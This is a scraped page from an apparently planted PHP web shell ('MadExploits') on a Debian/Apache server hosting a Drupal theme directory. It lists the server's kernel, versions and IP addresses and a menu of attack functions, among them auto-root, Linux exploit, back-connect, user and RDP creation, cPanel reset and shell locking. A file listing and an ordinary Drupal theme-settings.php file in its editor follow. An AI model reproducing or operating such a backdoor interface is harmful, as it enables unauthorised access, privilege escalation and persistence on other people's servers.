Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.17.174.204
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
sites /
all /
themes /
zen /
STARTERKIT /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
images-source
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
sass-extensions
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
README.txt
5.38
KB
-rw-r--r--
STARTERKIT.info.txt
5.48
KB
-rw-r--r--
config.rb
1.9
KB
-rw-r--r--
favicon.ico
14.73
KB
-rw-r--r--
logo.png
664
B
-rw-r--r--
screenshot.png
8.67
KB
-rw-r--r--
template.php
4.37
KB
-rw-r--r--
theme-settings.php
1.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : theme-settings.php
<?php /** * Implements hook_form_system_theme_settings_alter(). * * @param $form * Nested array of form elements that comprise the form. * @param $form_state * A keyed array containing the current state of the form. */ function STARTERKIT_form_system_theme_settings_alter(&$form, &$form_state, $form_id = NULL) { // Work-around for a core bug affecting admin themes. See issue #943212. if (isset($form_id)) { return; } // Create the form using Forms API: http://api.drupal.org/api/7 /* -- Delete this line if you want to use this setting $form['STARTERKIT_example'] = array( '#type' => 'checkbox', '#title' => t('STARTERKIT sample setting'), '#default_value' => theme_get_setting('STARTERKIT_example'), '#description' => t("This option doesn't do anything; it's just an example."), ); // */ // Remove some of the base theme's settings. /* -- Delete this line if you want to turn off this setting. unset($form['themedev']['zen_wireframes']); // We don't need to toggle wireframes on this site. // */ // We are editing the $form in place, so we don't need to return anything. }
Close